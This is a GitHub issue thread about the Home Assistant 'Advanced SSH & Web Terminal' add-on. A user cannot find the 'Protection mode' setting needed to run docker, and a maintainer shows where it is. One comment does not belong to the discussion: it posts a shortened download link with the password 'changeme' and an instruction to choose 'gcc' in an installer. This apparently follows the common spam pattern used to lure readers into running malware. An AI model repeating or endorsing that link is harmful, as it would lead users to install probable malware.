### ISSUE TITLE
docker is missing in documentation

### ISSUE THREAD

**Issue by tbowmo** [hassio-addons/addon-ssh#779]
# Problem/Motivation
Docker configuration is missing in the docs
When executing `docker` in the shell, I get a splash with info about required changes to the configuration, however it is not clear to me what parameter is needed in the configuration, in order to run docker command.

## Expected behavior
Able to configure for docker execution in order to inspect system settings for a container

## Actual behavior
Splash screen with vague indications to what needs to be done, but the mentioned switch "Protection mode" is nowhere in the ui.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by tbowmo** [comment]
I am aware that this is running on HAOS. I need to inspect docker running on haos, and so I connect with ssh to "Advanced SSH & Web Terminal", and issue the command `docker`

I then see this 
![image](https://github.com/user-attachments/assets/8ae8f388-3ff8-4561-832f-f06fbaaff31b)

I go to the configuration page of "Advanced SSH & Web Terminal", to set the mentioned setting. But it is nowhere to be found.

Documentation does not mention it either.

**Comment by N3rdix** [comment]
Not sure why it should be an issue with this add-on when you use a command like docker, but you can find the mentioned switch in the add-on's entry page:

![image](https://github.com/user-attachments/assets/e5006ced-28b9-4b3b-844b-9abab9da67e2)

**Comment by tbowmo** [comment]
Well it wasn't that obvious when it says, "Go to the configuration and change safemode" (or something like that). A bit confusing for newcomers to HAOS..

But I guess it's this way with all implementations of shell addons..
